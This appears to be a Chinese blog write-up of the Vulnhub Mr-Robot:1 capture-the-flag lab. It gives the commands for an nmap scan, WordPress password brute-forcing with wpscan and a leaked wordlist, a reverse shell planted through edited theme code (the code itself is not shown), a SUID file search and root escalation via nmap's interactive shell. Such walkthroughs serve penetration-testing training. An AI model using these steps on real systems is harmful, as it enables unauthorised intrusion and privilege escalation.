首页 > 其他分享 >Vulnhub:Mr-Robot:1靶机

Vulnhub:Mr-Robot:1靶机

时间:2023-03-21 18:14:23浏览次数:59  
标签:nmap Robot 192.168 提权 Vulnhub Mr -- 靶机 111.237

kali:192.168.111.111

靶机:192.168.111.237

信息收集

端口扫描
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.237

image

访问robots.txt,发现两个文件

image

发现fsocity.dic可以下载,查看后推测是爆破用的字典

image

通过wordpress后台找回密码功能爆破用户名

image

image

使用wpscan爆破密码
wpscan --url http://192.168.111.237 -U elliot -P fsocity.dic

image

登录后台修改源码为反弹shell

image

获得反弹shell

image

提权

查找suid权限的文件
find / -perm -u=s 2> /dev/null

image

通过nmap进行提权,提权方法:https://gtfobins.github.io/gtfobins/nmap/#sudo
/usr/local/bin/nmap --interactive
!sh

image

提升为root

image

标签:nmap,Robot,192.168,提权,Vulnhub,Mr,--,靶机,111.237
From: https://www.cnblogs.com/ctostm/p/17240893.html

相关文章